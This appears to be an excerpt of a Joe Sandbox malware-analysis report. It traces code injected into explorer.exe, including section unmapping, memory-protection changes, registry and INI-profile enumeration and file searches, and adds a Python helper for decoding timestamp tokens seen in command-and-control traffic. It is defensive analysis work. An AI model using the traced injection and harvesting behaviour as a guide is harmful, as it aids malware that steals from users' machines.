• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
• String ID: %li
• API String ID: 4120667308-1021419598
• Opcode ID: ce101e69ddaeb0d059ebf0e3e2d29b2bd8f79b06c5957bfd9384a58be5d0f5c2
• Instruction ID: 09cbca8ffb1d6619662dd7393f384ef6cdfdf1a655e2cd97f7a3de3a5dee6268
• Opcode Fuzzy Hash: ce101e69ddaeb0d059ebf0e3e2d29b2bd8f79b06c5957bfd9384a58be5d0f5c2
• Instruction Fuzzy Hash: 10E09232E4021877DB213BA89C0AEEF7F6DDB80A26F484691FA04B2181E5724A2487D5
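
The record above shows GetSystemTimeAsFileTime, a 64-bit _alldiv by 0x00989680 (10,000,000, the number of 100 ns FILETIME ticks in a second) and wsprintfA with the "%li" format: the function turns the current time into a decimal string of whole seconds. Two details matter to an analyst who wants to match such a value against C2 traffic, and the added Python below (not code from the report or from the sample) works them through: the count is seconds since 1601, not since the Unix epoch, unless an adjustment happens elsewhere in the function (the trace shows none; that it does not is an assumption), and "%li" prints a 32-bit long, so if only the low dword of the quotient is pushed (again an assumption, the trace does not show the arguments) the high bits of a value that already exceeds 2^32 are lost. The test timestamp is constructed.

```python
# Added example (not code from the Joe Sandbox report or from the sample): what the traced
# GetSystemTimeAsFileTime -> _alldiv(..., 0x989680) -> wsprintfA("%li") sequence computes.
# Assumptions: no epoch adjustment happens elsewhere in the function, and wsprintfA receives
# only the low dword of the 64-bit quotient (the trace shows the call, not its arguments).
from datetime import datetime, timezone

FILETIME_TICKS_PER_SECOND = 10_000_000          # 0x00989680, the _alldiv divisor in the trace
WINDOWS_TO_UNIX_EPOCH_SECONDS = 11_644_473_600  # 1601-01-01 to 1970-01-01, UTC
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
SAMPLE_TIME = datetime(2022, 6, 18, 4, 26, 40, tzinfo=timezone.utc)  # constructed test timestamp


def datetime_to_filetime(dt):
    """Build a 64-bit FILETIME (100 ns ticks since 1601-01-01 UTC) for a timestamp."""
    delta = dt.astimezone(timezone.utc) - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * FILETIME_TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_seconds(filetime):
    """What _alldiv(filetime, 10_000_000) yields: signed 64-bit division truncating toward zero."""
    q = abs(filetime) // FILETIME_TICKS_PER_SECOND
    return q if filetime >= 0 else -q


def format_li(value):
    """Render as wsprintfA("%li") would: a 32-bit signed long, i.e. the low dword of value.
    Seconds since 1601 exceed 2^32, so the printed token loses the high bits."""
    low = value & 0xFFFFFFFF
    if low & 0x80000000:
        low -= 1 << 32
    return "%d" % low


def reconstruct_token(dt):
    """Full pipeline for a UTC time: (seconds since 1601, Unix seconds, the '%li' token)."""
    secs = filetime_to_seconds(datetime_to_filetime(dt))
    return secs, secs - WINDOWS_TO_UNIX_EPOCH_SECONDS, format_li(secs)


def candidate_unix_times(li_token, unix_lower, unix_upper):
    """Inverse for triage: given a '%li' token seen in traffic and a plausible Unix-time
    window, return every Unix time whose low-dword second count matches the token."""
    low = int(li_token) & 0xFFFFFFFF
    lo = unix_lower + WINDOWS_TO_UNIX_EPOCH_SECONDS
    hi = unix_upper + WINDOWS_TO_UNIX_EPOCH_SECONDS
    t = low + ((lo - low) // (1 << 32)) * (1 << 32)   # largest candidate <= lo
    if t < lo:
        t += 1 << 32                                  # first candidate inside the window
    hits = []
    while t <= hi:
        hits.append(t - WINDOWS_TO_UNIX_EPOCH_SECONDS)
        t += 1 << 32
    return hits
```

For the constructed timestamp, reconstruct_token returns 13300000000 seconds since 1601, 1655526400 as Unix time, and the token "415098112" that a "%li" print of the low dword would produce; candidate_unix_times inverts that token back to the Unix time when given a window of a few years, which is the check to run before treating such a number in traffic as a Unix timestamp.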

APIs
• _allmul.NTDLL(?,00000000,00000018), ref: 0276316F
• _allmul.NTDLL(-00000001,00000000,?,?), ref: 027631D2
• _alldiv.NTDLL(?,?,00000000), ref: 027632DE
• _allmul.NTDLL(00000000,?,00000000), ref: 027632E7
• _allmul.NTDLL(?,00000000,?,?), ref: 02763392
  • Part of subcall function 027616CD: memset.NTDLL ref: 0276172B
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: _allmul$_alldivmemset
• String ID:
• API String ID: 3880648599-0
• Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction ID: 25c6bc0e2c9e543f40393eb7df74858c024b013eda00fc428592a6f4c1fd8ca7
• Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction Fuzzy Hash: 11D188716083418FDB25DF69C888B6ABBE6EFC8B04F04496DFD9597250DB70D849CB82

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID:
• String ID: FOREIGN KEY constraint failed$new$old
• API String ID: 0-384346570
• Opcode ID: d2f259fb0b54e555bd9ecc7c4a3bba17534b532d1afde1a19d9e9df1827263b0
• Instruction ID: f6ffbb5bd83acad33de10629dc22719fcb8ff5e71e207ae918a3e9640371092b
• Opcode Fuzzy Hash: d2f259fb0b54e555bd9ecc7c4a3bba17534b532d1afde1a19d9e9df1827263b0
• Instruction Fuzzy Hash: 34D125707483049FEB15EF24C984B2FBBEAABC8754F50891EF9458B290DB74D941CB92

APIs
• _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 027596E7
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 02759707
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 02759739
• _alldiv.NTDLL(00000001,80000000,?,?), ref: 0275976C
• _allmul.NTDLL(?,?,?,?), ref: 02759798
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: _alldiv$_allmul
• String ID:
• API String ID: 4215241517-0
• Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction ID: 744227941fe3d03fb948cd0b403ceeeaa19aea3004c4076d06764692925a29fb
• Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction Fuzzy Hash: A62104315043B7EAD7355D254CC4B6BF5D9CBD07A8F241D2FEF0192240FAD2840585E1

APIs
• _allmul.NTDLL(?,00000000,00000000), ref: 0276B1B3
• _alldvrm.NTDLL(?,?,00000000), ref: 0276B20F
• _allrem.NTDLL(?,00000000,?,?), ref: 0276B28A
• memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0276B298
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: _alldvrm_allmul_allremmemcpy
• String ID:
• API String ID: 1484705121-0
• Opcode ID: c07b1973dc15deb075946aadc925f946f6ec129b35c749f45d640880d61a26fe
• Instruction ID: d39c3ea06e40642088fb777610ae4d37e7f2b491e16e07baa0b9cad5649f2ad4
• Opcode Fuzzy Hash: c07b1973dc15deb075946aadc925f946f6ec129b35c749f45d640880d61a26fe
• Instruction Fuzzy Hash: 1A4126756083019FC719EF25C898A2BBBE6BFC9304F44992DF98597251DB31E805CF52

APIs
• GetHGlobalFromStream.COMBASE(?,?), ref: 027518A7
• GlobalLock.KERNEL32(02754B57), ref: 027518B6
• GlobalUnlock.KERNEL32(?), ref: 027518F4
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027518E8
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
• String ID:
• API String ID: 1688112647-0
• Opcode ID: 3ce90fa5a5d9d62fdf1194e344bd3d2a190b9a94c09e909d6df8ca9ab778bced
• Instruction ID: 373b6dfd2afcf9cda382768ac9a3a2bb5c1a84a9c48d04d9a1a6c143f3d557b8
• Opcode Fuzzy Hash: 3ce90fa5a5d9d62fdf1194e344bd3d2a190b9a94c09e909d6df8ca9ab778bced
• Instruction Fuzzy Hash: 7201A235640316AF8B115F29D80895FBBEEEFC4262B44C82EF80983250DF71D8149A20

APIs
• lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
• lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
• lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
• lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: 776665f6d7f7c59b0a0c94aab805562f03773db0fe395a2d13f5bae8ac98165a
• Instruction ID: fe45db40afd5a66eb428e53f96e215c5a9a6108fbfedac241642ef5ada56b034
• Opcode Fuzzy Hash: 776665f6d7f7c59b0a0c94aab805562f03773db0fe395a2d13f5bae8ac98165a
• Instruction Fuzzy Hash: CEE0656270026C1B4A1476AE5C94E7BB79DCAC95A634A4039FE08D3201FAA69C0546B0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02756A81: memset.NTDLL ref: 02756A9C
                                                                                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0277F2A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _aulldivmemset
                                                                                                                                        • String ID: %llu$%llu
                                                                                                                                        • API String ID: 714058258-4283164361
                                                                                                                                        • Opcode ID: e59ff1284b3358d9b1479c526be939fb8d4fd64b92b66b7e028f840c497f29a4
                                                                                                                                        • Instruction ID: 9324496af7b2cae70f11663186fcb06c107c0f88e7b82d1786a419788d09539f
                                                                                                                                        • Opcode Fuzzy Hash: e59ff1284b3358d9b1479c526be939fb8d4fd64b92b66b7e028f840c497f29a4
                                                                                                                                        • Instruction Fuzzy Hash: 2B21F6B26442156BDB15AA24CC49F6FB75AEF81730F044728FD22976C0DB61DC11CBE2
                                                                                                                                        APIs
                                                                                                                                        • _allmul.NTDLL(?,00000000,?), ref: 02762174
                                                                                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0276220E
                                                                                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 02762241
                                                                                                                                        • _allmul.NTDLL(02752E26,00000000,?,?), ref: 02762295
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _allmul
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4029198491-0
                                                                                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                        • Instruction ID: e5aa234eaff8a619a7bc37006636063fd540485d85ff0dd725adfc53d8ee4c9a
                                                                                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                        • Instruction Fuzzy Hash: 9DA166B07087019FC755EE65C898A3FB7E6AF88704F40482DFE969B251EB70EC458B42
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1297977491-0
                                                                                                                                        • Opcode ID: af376ec41a70e04bbcf17ff503d3a460e6231a99f720da1180408ef0166df4d8
                                                                                                                                        • Instruction ID: f0a079330af919b1f621804a9088fcf556fcda079054871b426098dd4f079aa1
                                                                                                                                        • Opcode Fuzzy Hash: af376ec41a70e04bbcf17ff503d3a460e6231a99f720da1180408ef0166df4d8
                                                                                                                                        • Instruction Fuzzy Hash: D4819D716083159FC355DF28C888A3BFBE6EF88758F44496DF88A97251E770E904CB91
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475610065-0
                                                                                                                                        • Opcode ID: 3b19169f51a2f1e51afd1bf1f69bcbd74e54489e32a7d4308cac141e0809bd3a
                                                                                                                                        • Instruction ID: ede1772f415710df6029033855fa27bd64405c075e9bf9ef6cd6eab4e6b0b2c8
                                                                                                                                        • Opcode Fuzzy Hash: 3b19169f51a2f1e51afd1bf1f69bcbd74e54489e32a7d4308cac141e0809bd3a
                                                                                                                                        • Instruction Fuzzy Hash: B6E09B9270026C1B4A2176AE5C84F7BB7DDCAC55B634A0175FD08D3201EF969C014AF0

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:21.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:181
                                                                                                                                        Total number of Limit Nodes:17
                                                                                                                                        execution_graph: rendered graph figure (node and edge serialization omitted). Entry nodes: cda1af, cda1f9, cda298, cd3608, cd3668, cd37f4, cda1e0. APIs reached from the graph: LoadLibraryA, VirtualProtect, StrStrIW, RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegCloseKey, RegCreateKeyExW, RtlFreeHeap, GetFileAttributesW, CreateFileW, CloseHandle, GetPrivateProfileSectionNamesW, GetPrivateProfileStringW, GetPrivateProfileIntW, FindFirstFileW, FindNextFileW, FindClose, CreateStreamOnHGlobal.

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph: rendered graph figure (edge serialization omitted). Nodes are the functions Function_00CD1000 through Function_00CDB181 of the memory dump at offset 00CD1000.

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph: rendered figure for cd30a8-cd3252 (basic-block serialization omitted). The function calls cd2688, cd272c, cd2700, cd2af8, cd2f7c and cd1860 and loops over FindFirstFileW / FindNextFileW / FindClose.
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                        • Instruction ID: efecc55afcb6a33f0b603e3616053bf80af56c2ce56028a8ace048c0c6e4c7a4
                                                                                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                        • Instruction Fuzzy Hash: A2419430718B4D5FDB54FB3888487AE73E2FBD8340F444A2AA55AC3391EE74DA049782

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph: rendered figure for cd38b0-cd391a (basic-block serialization omitted). The function calls cd1ad4, cd1838, NtUnmapViewOfSection and cd388c, and recurses into cd38b0.
                                                                                                                                        APIs
                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 00CD38F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 498011366-0
                                                                                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                        • Instruction ID: 0cebeac83c0bf4d2032fe3c223357df7a9e1e2b6399a428aa3656d8bebeff8cf
                                                                                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                        • Instruction Fuzzy Hash: DAF0A020F11A481BEA6C77BD685D3382280EB98310F50052BBA29C33D2DC398A45A302

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
• RegOpenKeyExW.KERNELBASE ref: 00CD27C7
• RegQueryValueExW.KERNELBASE ref: 00CD27F4
• RegQueryValueExW.KERNELBASE ref: 00CD283A
• RegCloseKey.KERNELBASE ref: 00CD2860
  • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: QueryValue$CloseFreeHeapOpen
• String ID:
• API String ID: 1641618270-0
• Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction ID: 8c199e66a84977d9b1a4cbb2a0d23a4e6a98e6cfe5ef8ad20f60a6bbc89fa2dd
• Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction Fuzzy Hash: 1531B431208B488FE768DB28D84877AB7D0FBB8355F04062FE59AC33A4DF24C9419742

Control-flow Graph (function at cd372c; rendered graph not reproduced as text)

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: CloseCreate
• String ID: ?
• API String ID: 2932200918-1684325040
• Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction ID: 060fe8ae8641a56d3f64adb11b76773638a4de592244b6899c1b319aa9125b8e
• Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction Fuzzy Hash: D1119070608B488FD751DF69D48866AB7E1FB98305F40062FE58AC3360DF389985CB82

Control-flow Graph (function at cda298; rendered graph not reproduced as text)

APIs
• LoadLibraryA.KERNELBASE ref: 00CDA397
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CDA441
• VirtualProtect.KERNELBASE ref: 00CDA45F
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd9000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction ID: 58190240237f4911a929fb40dbe2bcc2b0b3c080442d9a11ae811a6ccc8089c9
• Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction Fuzzy Hash: 7E517B32758D1D4BCB24AB7D9CC43F5B3D2F759321B18062BC6AAC3394D659D9468383

Control-flow Graph (function at cd3254; rendered graph not reproduced as text)

APIs
  • Part of subcall function 00CD298C: GetFileAttributesW.KERNELBASE ref: 00CD299E
• GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CD330F
• GetPrivateProfileStringW.KERNEL32 ref: 00CD336F
• GetPrivateProfileIntW.KERNEL32 ref: 00CD338C
  • Part of subcall function 00CD30A8: FindFirstFileW.KERNELBASE ref: 00CD3104
  • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
• String ID:
• API String ID: 970345848-0
• Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction ID: 3e2769eba35e02b15745bedafd0d47ff4642b4af7798e971c210e2bca119bbcc
• Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction Fuzzy Hash: C251C830718F494FDB59BB2C985667973D2EB98300B44056FE50AC33A6EE68DE429387

Control-flow Graph

APIs
• StrStrIW.KERNELBASE ref: 00CD347E
• RegOpenKeyExW.KERNELBASE ref: 00CD353F
• RegEnumKeyExW.KERNELBASE ref: 00CD35D6
  • Part of subcall function 00CD2774: RegOpenKeyExW.KERNELBASE ref: 00CD27C7
  • Part of subcall function 00CD2774: RegQueryValueExW.KERNELBASE ref: 00CD27F4
  • Part of subcall function 00CD2774: RegQueryValueExW.KERNELBASE ref: 00CD283A
  • Part of subcall function 00CD2774: RegCloseKey.KERNELBASE ref: 00CD2860
  • Part of subcall function 00CD3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CD330F
  • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
• String ID:
• API String ID: 1841478724-0
• Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction ID: 532dbf9ff45ba5a11511f8ceba21a2d0629c736112453e8dbab0d4ca605cb3ec
• Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction Fuzzy Hash: 2C416C30718B484FDB98EF6D989972AB6E1FBA8340F04056FA64EC33A1DE34D9049742

Control-flow Graph (function at cd2938; rendered graph not reproduced as text)

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
• Instruction ID: ec0af98eedff929190eda62d0642102516939b4f0c154fdb73f5c61f5a3400b5
• Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
• Instruction Fuzzy Hash: 2CF09B7021570A4FE7546FB944A8336F5D0FB58355F18473FE56AC23D0D73589468742

Control-flow Graph (function at cd22b4; rendered graph not reproduced as text)

APIs
• CreateStreamOnHGlobal.COMBASE ref: 00CD22D0
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
• Instruction ID: 1424638a0b81a80592d31abe9665812c92e2a01a8318d9842ccdb6f5896c017e
• Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
• Instruction Fuzzy Hash: F4E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741

Control-flow Graph (function at cd298c; rendered graph not reproduced as text)

APIs
• GetFileAttributesW.KERNELBASE ref: 00CD299E
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
• Instruction ID: 7c4c1690b719600eab60d748d600d57a62179ad355cbe52532f2fe6f330f9d76
• Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
• Instruction Fuzzy Hash: DAD0A722732905077B6426FA08FD27130A0D73933AF14033BEB36C13E0E285CED5A201

Control-flow Graph (function at cd1860; rendered graph not reproduced as text)

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
• Instruction ID: 906c5f5480795516f80189ca7738020dd837821f30b6fb5d641866e8c74cc002
• Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
• Instruction Fuzzy Hash: E8D01224716A041BEF2CBBFA1C8D174BAD2E758212B1D8066BD19C3392ED39C895D341

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                        Signature Coverage:27.5%
                                                                                                                                        Total number of Nodes:306
                                                                                                                                        Total number of Limit Nodes:42

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142608: VirtualQuery.KERNEL32(00144434,?,0000001C), ref: 00142615
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00141038
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0014106B
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00141074
